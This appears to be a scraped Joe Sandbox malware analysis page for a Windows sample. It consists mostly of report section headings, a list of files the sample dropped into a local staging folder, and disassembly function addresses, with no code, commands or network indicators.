Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dBvNa2pTbj

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dBvNa2pTbj.exe.log

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\AIXACVYBSB.png

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\BJZFPPWAPT\EOWRVPQCCS.jpg

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\BJZFPPWAPT\ZGGKNSUKOP.png

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\EOWRVPQCCS.jpg

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\GIGIYTFFYT.jpg

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\IVHSHTCODI\AIXACVYBSB.png

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\IVHSHTCODI\TQDGENUHWP.jpg

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\PALRGUCVEH\GIGIYTFFYT.jpg

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\PALRGUCVEH\TQDFJHPUIU.png

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\TQDFJHPUIU.png

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\TQDGENUHWP.jpg

C:\Users\user\AppData\Local\g1nz0l1s7\Desktop Files\ZGGKNSUKOP.png

C:\Users\user\AppData\Local\g1nz0l1s7\Information.txt

C:\Users\user\AppData\Local\g1nz0l1s7\Screenshot.png

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
dBvNa2pTbj

Function 01535AF1 Relevance: 6.7, Strings: 5, Instructions: 415
COMMON

Function 01535BFB Relevance: 6.6, Strings: 5, Instructions: 337
COMMON

Function 01530E54 Relevance: 1.8, APIs: 1, Instructions: 295
COMMON

Function 015310B9 Relevance: 1.7, APIs: 1, Instructions: 186
memoryCOMMON

Function 0153105D Relevance: 1.7, APIs: 1, Instructions: 181
memoryCOMMON

Function 01531030 Relevance: 1.7, APIs: 1, Instructions: 181
memoryCOMMON

Function 01530FE1 Relevance: 1.7, APIs: 1, Instructions: 181
memoryCOMMON

Function 01531143 Relevance: 1.7, APIs: 1, Instructions: 180
memoryCOMMON

Function 0153160B Relevance: 1.7, APIs: 1, Instructions: 178
COMMON

Function 015315D6 Relevance: 1.7, APIs: 1, Instructions: 174
memoryCOMMON

Function 015311D1 Relevance: 1.7, APIs: 1, Instructions: 172
memoryCOMMON

Function 015311FE Relevance: 1.7, APIs: 1, Instructions: 172
memoryCOMMON

Function 01531518 Relevance: 1.7, APIs: 1, Instructions: 172
memoryCOMMON

Function 01531454 Relevance: 1.7, APIs: 1, Instructions: 172
memoryCOMMON